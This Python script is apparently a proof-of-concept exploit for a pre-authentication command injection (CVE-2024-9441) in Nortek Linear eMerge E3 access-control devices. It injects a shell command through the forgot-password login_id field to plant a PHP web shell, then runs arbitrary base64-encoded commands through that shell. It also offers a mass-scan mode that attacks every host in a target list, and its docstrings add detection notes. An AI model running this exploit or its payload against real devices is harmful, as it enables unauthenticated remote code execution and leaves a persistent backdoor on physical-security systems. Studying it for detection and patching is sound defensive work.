import argparse
import base64
import requests
# Function to exploit a single target
def exploit(target, port, cmd):
    """Send the two-request proof of concept to one host and print the outcome.

    Request 1 posts a ``login_id`` value wrapped in backticks to the
    forgot-password endpoint. The shell command inside the backticks writes a
    one-line PHP file to ``img/index.html``. Request 2 posts the
    base64-encoded ``cmd`` to that file in the ``c`` field and prints the
    response body. Neither request carries credentials or a session.

    Args:
        target: Host name or address placed in the URL.
        port: TCP port placed in the URL.
        cmd: Command string; it is base64-encoded before being sent.

    Returns:
        None. Results are reported on stdout only; any exception raised
        inside the ``try`` is caught and printed.

    Detection notes, derived from the two requests below:
        * A POST to ``/index.php?c=user&m=forgot_password`` whose
          ``login_id`` contains backticks or other shell metacharacters is
          not a plausible password-reset request.
        * A POST to ``/img/index.html`` with a base64 ``c`` field, and an
          ``img/index.html`` under the web root containing ``<?php``, are the
          artifacts this leaves behind.
        * Nothing here deletes ``img/index.html``; the file remains on the
          device as an unauthenticated command endpoint until it is removed.
    """
    base_url = f"https://{target}:{port}"
    inject_url = base_url + "/index.php?c=user&m=forgot_password"
    # The backticks are what make this an OS command injection: the PoC
    # relies on the application handing login_id to a shell unescaped, and
    # evidently on the web server executing PHP found in a .html file.
    injection_form = {'login_id': '`echo \'<?php exec(base64_decode($_POST["c"]),$output);echo(implode("\n",$output));?>\' > img/index.html`'}

    try:
        # verify=False disables certificate validation, so the peer is not
        # authenticated (urllib3 emits InsecureRequestWarning for this).
        write_reply = requests.post(inject_url, data=injection_form, verify=False, timeout=5)
        if write_reply.status_code != 200:
            print(f"[-] Failed to upload payload on {target}:{port}.")
            return
        # HTTP 200 only shows the endpoint answered; it does not by itself
        # confirm that the file was written.
        print("[+] Payload uploaded successfully.")

        run_reply = requests.post(
            base_url + "/img/index.html",
            data={'c': base64.b64encode(cmd.encode()).decode()},
            verify=False,
            timeout=5,
        )
        if run_reply.status_code != 200:
            print(f"[-] Exploit failed on {target}:{port}.")
            return
        print(f"[+] Command executed on {target}:{port}:")
        print(run_reply.text)
    except Exception as e:
        # Broad catch: connection errors, timeouts and bad arguments all end
        # up as one printed line.
        print(f"[-] Error with {target}:{port}: {e}")
# Function to perform mass scanning using a list of targets
def mass_scan(targets_file, cmd):
    """Call ``exploit`` once for every ``host:port`` line in a text file.

    Args:
        targets_file: Path of a file with one ``host:port`` entry per line.
        cmd: Command string forwarded unchanged to ``exploit``.

    Raises:
        ValueError: If a stripped line does not split on ``:`` into exactly
            two fields. It is not caught here.
    """
    with open(targets_file, 'r') as handle:
        for entry in handle:
            # The port stays a string here; it is only interpolated into
            # the URL by exploit().
            host, port_text = entry.strip().split(':')
            exploit(host, port_text, cmd)
def main():
    """Parse the command line and dispatch to ``mass_scan`` or ``exploit``.

    ``--list`` takes precedence over ``--ip`` when both are given. With
    neither, a usage hint is printed and nothing is sent.
    """
    cli = argparse.ArgumentParser(
        description="Nortek Linear eMerge E3 Pre-Auth RCE PoC (CVE-2024-9441)"
    )
    cli.add_argument('--ip', type=str, help="Target IP address")
    cli.add_argument('--port', type=int, default=443, help="Target port")
    # The default command lists the device's web root, as named on this page.
    cli.add_argument(
        '--cmd',
        type=str,
        default="/bin/ls -al /spider/web",
        help="Command to execute",
    )
    cli.add_argument(
        '--list',
        type=str,
        help="File containing list of targets (IP:port)",
    )
    opts = cli.parse_args()

    if opts.list:
        mass_scan(opts.list, opts.cmd)
        return
    if opts.ip:
        exploit(opts.ip, opts.port, opts.cmd)
        return
    print("[-] Please provide either a single target (--ip) or a list of targets (--list).")
# Run the command-line entry point only when this file is executed as a
# script, not when it is imported as a module.
if __name__ == "__main__":
    main()